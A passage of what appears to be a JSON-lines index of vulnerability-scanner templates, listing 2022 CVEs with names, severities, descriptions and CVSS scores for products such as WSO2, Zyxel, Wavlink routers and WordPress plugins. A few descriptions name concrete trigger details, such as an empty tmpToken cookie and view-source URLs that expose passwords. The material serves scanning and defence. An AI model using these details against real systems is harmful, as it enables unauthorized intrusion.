Elementor Website Builder \u003c= 3.5.5 - DOM Cross-Site Scripting","Severity":"medium","Description":"WordPress Elementor Website Builder plugin 3.5.5 and prior contains a reflected cross-site scripting vulnerability via the document object model.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-29455.yaml"} +{"ID":"CVE-2022-29464","Info":{"Name":"WSO2 Management - Arbitrary File Upload \u0026 Remote Code Execution","Severity":"critical","Description":"Certain WSO2 products allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-29464.yaml"} +{"ID":"CVE-2022-29548","Info":{"Name":"WSO2 - Cross-Site Scripting","Severity":"medium","Description":"WSO2 contains a reflected cross-site scripting vulnerability in the Management Console of API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-29548.yaml"} +{"ID":"CVE-2022-29775","Info":{"Name":"iSpy 7.2.2.0 - Authentication Bypass","Severity":"critical","Description":"iSpy 7.2.2.0 contains an authentication bypass vulnerability. An attacker can craft a URL and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-29775.yaml"} +{"ID":"CVE-2022-30073","Info":{"Name":"WBCE CMS 1.5.2 - Cross-Site Scripting","Severity":"medium","Description":"WBCE CMS 1.5.2 contains a stored cross-site scripting vulnerability via \\admin\\user\\save.php Display Name parameters.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2022/CVE-2022-30073.yaml"} +{"ID":"CVE-2022-30489","Info":{"Name":"Wavlink WN-535G3 - Cross-Site Scripting","Severity":"medium","Description":"Wavlink WN-535G3 contains a POST cross-site scripting vulnerability via the hostname parameter at /cgi-bin/login.cgi.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-30489.yaml"} +{"ID":"CVE-2022-30512","Info":{"Name":"School Dormitory Management System 1.0 - SQL Injection","Severity":"critical","Description":"School Dormitory Management System 1.0 contains a SQL injection vulnerability via accounts/payment_history.php:31. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-30512.yaml"} +{"ID":"CVE-2022-30513","Info":{"Name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","Severity":"medium","Description":"School Dormitory Management System 1.0 contains an authenticated cross-site scripting vulnerability via admin/inc/navigation.php:125. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-30513.yaml"} +{"ID":"CVE-2022-30514","Info":{"Name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","Severity":"medium","Description":"School Dormitory Management System 1.0 contains an authenticated cross-site scripting vulnerability in admin/inc/navigation.php:126. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-30514.yaml"} +{"ID":"CVE-2022-30525","Info":{"Name":"Zyxel Firewall - OS Command Injection","Severity":"critical","Description":"An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-30525.yaml"} +{"ID":"CVE-2022-30776","Info":{"Name":"Atmail 6.5.0 - Cross-Site Scripting","Severity":"medium","Description":"Atmail 6.5.0 contains a cross-site scripting vulnerability via the index.php/admin/index/ 'error' parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-30776.yaml"} +{"ID":"CVE-2022-30777","Info":{"Name":"Parallels H-Sphere 3.6.1713 - Cross-Site Scripting","Severity":"medium","Description":"Parallels H-Sphere 3.6.1713 contains a cross-site scripting vulnerability via the index_en.php 'from' parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-30777.yaml"} +{"ID":"CVE-2022-31126","Info":{"Name":"Roxy-WI \u003c6.1.1.0 - Remote Code Execution","Severity":"critical","Description":"Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-31126.yaml"} +{"ID":"CVE-2022-31268","Info":{"Name":"Gitblit 1.9.3 - Local File Inclusion","Severity":"high","Description":"Gitblit 1.9.3 is vulnerable to local file inclusion via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname).\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-31268.yaml"} +{"ID":"CVE-2022-31269","Info":{"Name":"eMerge E3-Series - Information Disclosure","Severity":"high","Description":"Admin credentials are stored in clear text at the endpoint /test.txt (This occurs in situations where the default credentials admin:admin have beenchanged.) Allows an unauthenticated attacker to obtain adminicredentials, access the admin dashboard of Linear eMerge E3-Series devices, control entire building doors, cameras, elevator, etc... and access information about employees who can access the building and take control of the entire building.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"cves/2022/CVE-2022-31269.yaml"} +{"ID":"CVE-2022-31299","Info":{"Name":"Haraj 3.7 - Cross-Site Scripting","Severity":"medium","Description":"Haraj 3.7 contains a cross-site scripting vulnerability in the User Upgrade Form. An attacker can inject malicious script and thus steal authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-31299.yaml"} +{"ID":"CVE-2022-31373","Info":{"Name":"SolarView Compact 6.00 - Cross-Site Scripting","Severity":"medium","Description":"SolarView Compact 6.00 contains a cross-site scripting vulnerability via Solar_AiConf.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-31373.yaml"} +{"ID":"CVE-2022-31474","Info":{"Name":"BackupBuddy - Local File Inclusion","Severity":"high","Description":"BackupBuddy versions 8.5.8.0 - 8.7.4.1 are vulnerable to a local file inclusion vulnerability via the 'download' and 'local-destination-id' parameters.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-31474.yaml"} +{"ID":"CVE-2022-31656","Info":{"Name":"VMware - Authentication Bypass","Severity":"critical","Description":"VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-31656.yaml"} +{"ID":"CVE-2022-31793","Info":{"Name":"muhttpd \u003c= 1.1.5 - Path traversal","Severity":"high","Description":"A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-31793.yaml"} +{"ID":"CVE-2022-31798","Info":{"Name":"Nortek Linear eMerge E3-Series - Cross-Site Scripting","Severity":"medium","Description":"There is a local session fixation vulnerability that, when chained with cross-site scripting, leads to account take over of admin or a lower privileged user.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-31798.yaml"} +{"ID":"CVE-2022-31814","Info":{"Name":"pfSense pfBlockerNG \u003c=2.1..4_26 - OS Command Injection","Severity":"critical","Description":"pfSense pfBlockerNG through 2.1.4_26 is susceptible to OS command injection via root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-31814.yaml"} +{"ID":"CVE-2022-31845","Info":{"Name":"WAVLINK WN535 G3 - Information Disclosure","Severity":"high","Description":"A vulnerability in live_check.shtml of WAVLINK WN535 G3 M35G3R.V5030.180927 allows attackers to obtain sensitive router information via execution of the exec cmd function.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-31845.yaml"} +{"ID":"CVE-2022-31846","Info":{"Name":"WAVLINK WN535 G3 - Information Disclosure","Severity":"high","Description":"A vulnerability is in the 'live_mfg.shtml' page of the WAVLINK WN535 G3,Firmware package version M35G3R.V5030.180927\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-31846.yaml"} +{"ID":"CVE-2022-31847","Info":{"Name":"WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure","Severity":"high","Description":"A vulnerability in /cgi-bin/ExportAllSettings.sh of WAVLINK WN579 X3 M79X3.V5030.180719 allows attackers to obtain sensitive router information via a crafted POST request.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-31847.yaml"} +{"ID":"CVE-2022-32007","Info":{"Name":"Complete Online Job Search System 1.0 - SQL Injection","Severity":"high","Description":"Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/admin/company/index.php?view=edit\u0026id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2022/CVE-2022-32007.yaml"} +{"ID":"CVE-2022-32015","Info":{"Name":"Complete Online Job Search System 1.0 - SQL Injection","Severity":"high","Description":"Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=category\u0026search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2022/CVE-2022-32015.yaml"} +{"ID":"CVE-2022-32018","Info":{"Name":"Complete Online Job Search System 1.0 - SQL Injection","Severity":"high","Description":"Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=hiring\u0026search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2022/CVE-2022-32018.yaml"} +{"ID":"CVE-2022-32022","Info":{"Name":"Car Rental Management System 1.0 - SQL Injection","Severity":"high","Description":"Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/ajax.php?action=login. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2022/CVE-2022-32022.yaml"} +{"ID":"CVE-2022-32024","Info":{"Name":"Car Rental Management System 1.0 - SQL Injection","Severity":"high","Description":"Car Rental Management System 1.0 contains an SQL injection vulnerability via /booking.php?car_id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2022/CVE-2022-32024.yaml"} +{"ID":"CVE-2022-32025","Info":{"Name":"Car Rental Management System 1.0 - SQL Injection","Severity":"high","Description":"Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/view_car.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2022/CVE-2022-32025.yaml"} +{"ID":"CVE-2022-32026","Info":{"Name":"Car Rental Management System 1.0 - SQL Injection","Severity":"high","Description":"Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_booking.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2022/CVE-2022-32026.yaml"} +{"ID":"CVE-2022-32028","Info":{"Name":"Car Rental Management System 1.0 - SQL Injection","Severity":"high","Description":"Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2022/CVE-2022-32028.yaml"} +{"ID":"CVE-2022-32094","Info":{"Name":"Hospital Management System 1.0 - SQL Injection","Severity":"critical","Description":"Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/doctor.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-32094.yaml"} +{"ID":"CVE-2022-32195","Info":{"Name":"Open edX \u003c2022-06-06 - Cross-Site Scripting","Severity":"medium","Description":"Open edX before 2022-06-06 contains a reflected cross-site scripting vulnerability via the 'next' parameter in the logout URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-32195.yaml"} +{"ID":"CVE-2022-32409","Info":{"Name":"Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion","Severity":"critical","Description":"Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-32409.yaml"} +{"ID":"CVE-2022-32444","Info":{"Name":"u5cms v8.3.5 - Open Redirect","Severity":"medium","Description":"u5cms version 8.3.5 contains a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-32444.yaml"} +{"ID":"CVE-2022-32770","Info":{"Name":"WWBN AVideo 11.6 - Cross-Site Scripting","Severity":"medium","Description":"WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'toast' parameter, which is inserted into the document with insufficient sanitization.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-32770.yaml"} +{"ID":"CVE-2022-32771","Info":{"Name":"WWBN AVideo 11.6 - Cross-Site Scripting","Severity":"medium","Description":"WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'success' parameter, which is inserted into the document with insufficient sanitization.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-32771.yaml"} +{"ID":"CVE-2022-32772","Info":{"Name":"WWBN AVideo 11.6 - Cross-Site Scripting","Severity":"medium","Description":"WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'msg' parameter, which is inserted into the document with insufficient sanitization.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-32772.yaml"} +{"ID":"CVE-2022-33119","Info":{"Name":"NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting","Severity":"medium","Description":"NUUO NVRsolo Video Recorder 03.06.02 contains a reflected cross-site scripting vulnerability via login.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-33119.yaml"} +{"ID":"CVE-2022-33174","Info":{"Name":"Powertek Firmware \u003c3.30.30 - Authorization Bypass","Severity":"high","Description":"Powertek firmware (multiple brands) before 3.30.30 running Power Distribution Units are vulnerable to authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-33174.yaml"} +{"ID":"CVE-2022-33891","Info":{"Name":"Apache Spark UI - Command Injection","Severity":"high","Description":"The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2022/CVE-2022-33891.yaml"} +{"ID":"CVE-2022-33901","Info":{"Name":"MultiSafepay plugin for WooCommerce \u003c= 4.13.1 - Unauthenticated Arbitrary File Read","Severity":"high","Description":"Unauthenticated Arbitrary File Read vulnerability in MultiSafepay plugin for WooCommerce plugin \u003c= 4.13.1 at WordPress.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-33901.yaml"} +{"ID":"CVE-2022-33965","Info":{"Name":"WordPress Visitor Statistics \u003c=5.7 - SQL Injection","Severity":"critical","Description":"WordPress Visitor Statistics plugin through 5.7 contains multiple unauthenticated SQL injection vulnerabilities. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-33965.yaml"} +{"ID":"CVE-2022-34045","Info":{"Name":"Wavlink WN530HG4 - Access Control","Severity":"critical","Description":"Wavlink WN530HG4 M30HG4.V5030.191116 was discovered to contain a hardcoded encryption/decryption key for its configuration files at /etc_ro/lighttpd/www/cgi-bin/ExportAllSettings.sh.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-34045.yaml"} +{"ID":"CVE-2022-34046","Info":{"Name":"Wavlink Sysinit.shtml - Password Exposure","Severity":"high","Description":"An access control issue in Wavlink WN533A8 M33A8.V5030.190716 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);].\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-34046.yaml"} +{"ID":"CVE-2022-34047","Info":{"Name":"Wavlink Set_safety.shtml - Password Exposure","Severity":"high","Description":"An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd].\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-34047.yaml"} +{"ID":"CVE-2022-34048","Info":{"Name":"Wavlink WN-533A8 - Cross-Site Scripting","Severity":"medium","Description":"Wavlink WN-533A8 M33A8.V5030.190716 contains a reflected cross-site scripting vulnerability via the login_page parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-34048.yaml"} +{"ID":"CVE-2022-34049","Info":{"Name":"Wavlink Exportlogs.sh - Configuration Exposure","Severity":"medium","Description":"An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows unauthenticated attackers to download log files and configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-34049.yaml"} +{"ID":"CVE-2022-34121","Info":{"Name":"CuppaCMS v1.0 - Local File Inclusion","Severity":"high","Description":"Cuppa CMS v1.0 was discovered to contain a local file inclusion (LFI) vulnerability via the component /templates/default/html/windows/right.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-34121.yaml"} +{"ID":"CVE-2022-34328","Info":{"Name":"PMB 7.3.10 - Cross-Site Scripting","Severity":"medium","Description":"PMB 7.3.10 contains a reflected cross-site scripting vulnerability via the id parameter in an lvl=author_see request to index.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-34328.yaml"} +{"ID":"CVE-2022-34576","Info":{"Name":"WAVLINK WN535 G3 - Access Control","Severity":"high","Description":"A vulnerability in /cgi-bin/ExportAllSettings.sh of WAVLINK WN535 G3 M35G3R.V5030.180927 allows attackers to execute arbitrary code via a crafted POST request.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-34576.yaml"} +{"ID":"CVE-2022-34590","Info":{"Name":"Hospital Management System 1.0 - SQL Injection","Severity":"high","Description":"Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/admin.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2022/CVE-2022-34590.yaml"} +{"ID":"CVE-2022-3484","Info":{"Name":"WordPress WPB Show Core - Cross-Site Scripting","Severity":"medium","Description":"WordPress wpb-show-core plugin through TODO contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-3484.yaml"} +{"ID":"CVE-2022-3506","Info":{"Name":"WordPress Related Posts \u003c2.1.3 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress Related Posts plugin prior to 2.1.3 contains a cross-site scripting vulnerability in the rp4wp[heading_text] parameter. User input is not properly sanitized, allowing the insertion of arbitrary code that can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2022/CVE-2022-3506.yaml"} +{"ID":"CVE-2022-35151","Info":{"Name":"kkFileView 4.1.0 - Cross-Site Scripting","Severity":"medium","Description":"kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-35151.yaml"} +{"ID":"CVE-2022-35405","Info":{"Name":"Zoho ManageEngine - Remote Code Execution","Severity":"critical","Description":"Zoho ManageEngine Password Manager Pro, PAM 360, and Access Manager Plus are susceptible to unauthenticated remote code execution via XML-RPC. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-35405.yaml"} +{"ID":"CVE-2022-35413","Info":{"Name":"Wapples Web Application Firewall - Hardcoded credentials","Severity":"critical","Description":"WAPPLES through 6.0 has a hardcoded systemi account accessible via db/wp.no1 (as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file). A threat actor could use this account to access the system configuration and confidential information (such as SSL keys) via an HTTPS request to the /webapi/ URI on port 443 or 5001.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-35413.yaml"} +{"ID":"CVE-2022-35416","Info":{"Name":"H3C SSL VPN \u003c=2022-07-10 - Cross-Site Scripting","Severity":"medium","Description":"H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-35416.yaml"} +{"ID":"CVE-2022-35493","Info":{"Name":"eShop 3.0.4 - Cross-Site Scripting","Severity":"medium","Description":"eShop 3.0.4 contains a reflected cross-site scripting vulnerability in json search parse and json response in wrteam.in.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-35493.yaml"} +{"ID":"CVE-2022-3578","Info":{"Name":"WordPress ProfileGrid \u003c5.1.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress ProfileGrid plugin prior to 5.1.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-3578.yaml"} +{"ID":"CVE-2022-35914","Info":{"Name":"GLPI \u003c=10.0.2 - Remote Command Execution","Severity":"critical","Description":"GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-35914.yaml"} +{"ID":"CVE-2022-36642","Info":{"Name":"Omnia MPX 1.5.0+r1 - Path Traversal","Severity":"critical","Description":"A local file disclosure vulnerability in /appConfig/userDB.json of Telos Alliance Omnia MPX Node through 1.5.0+r1 allows attackers to escalate privileges to root and execute arbitrary commands.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-36642.yaml"} +{"ID":"CVE-2022-36804","Info":{"Name":"Atlassian Bitbucket Command Injection Vulnerability","Severity":"high","Description":"Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2022/CVE-2022-36804.yaml"} +{"ID":"CVE-2022-36883","Info":{"Name":"Git Plugin up to 4.11.3 on Jenkins Build Authorization","Severity":"high","Description":"A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-36883.yaml"} +{"ID":"CVE-2022-37042","Info":{"Name":"Zimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution","Severity":"critical","Description":"Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-37042.yaml"} +{"ID":"CVE-2022-37153","Info":{"Name":"Artica Proxy 4.30.000000 - Cross-Site Scripting","Severity":"medium","Description":"Artica Proxy 4.30.000000 contains a cross-site scripting vulnerability via the password parameter in /fw.login.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-37153.yaml"} +{"ID":"CVE-2022-37299","Info":{"Name":"Shirne CMS 1.2.0. - Path Traversal","Severity":"medium","Description":"Shirne CMS 1.2.0 There is a Path Traversal vulnerability which could cause arbitrary file read via /static/ueditor/php/controller.php","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2022/CVE-2022-37299.yaml"} +{"ID":"CVE-2022-3768","Info":{"Name":"WPSmartContracts \u003c 1.3.12 - Author SQLi","Severity":"high","Description":"The WPSmartContracts WordPress plugin before 1.3.12 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2022/CVE-2022-3768.yaml"} +{"ID":"CVE-2022-38463","Info":{"Name":"ServiceNow - Cross-Site Scripting","Severity":"medium","Description":"ServiceNow through San Diego Patch 4b and Patch 6 contains a cross-site scripting vulnerability in the logout functionality, which can enable an unauthenticated remote attacker to execute arbitrary JavaScript.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-38463.yaml"} +{"ID":"CVE-2022-38553","Info":{"Name":"Academy Learning Management System \u003c5.9.1 - Cross-Site Scripting","Severity":"medium","Description":"Academy Learning Management System before 5.9.1 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-38553.yaml"} +{"ID":"CVE-2022-38637","Info":{"Name":"Hospital Management System 1.0 - SQL Injection","Severity":"critical","Description":"Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/user-login.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-38637.yaml"} +{"ID":"CVE-2022-38794","Info":{"Name":"Zaver - Local File Inclusion","Severity":"high","Description":"Zaver through 2020-12-15 allows directory traversal via the GET /.. substring.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-38794.yaml"} +{"ID":"CVE-2022-38817","Info":{"Name":"Dapr Dashboard - Unauthorized Access","Severity":"high","Description":"Dapr Dashboard v0.1.0 through v0.10.0 is vulnerable to Incorrect 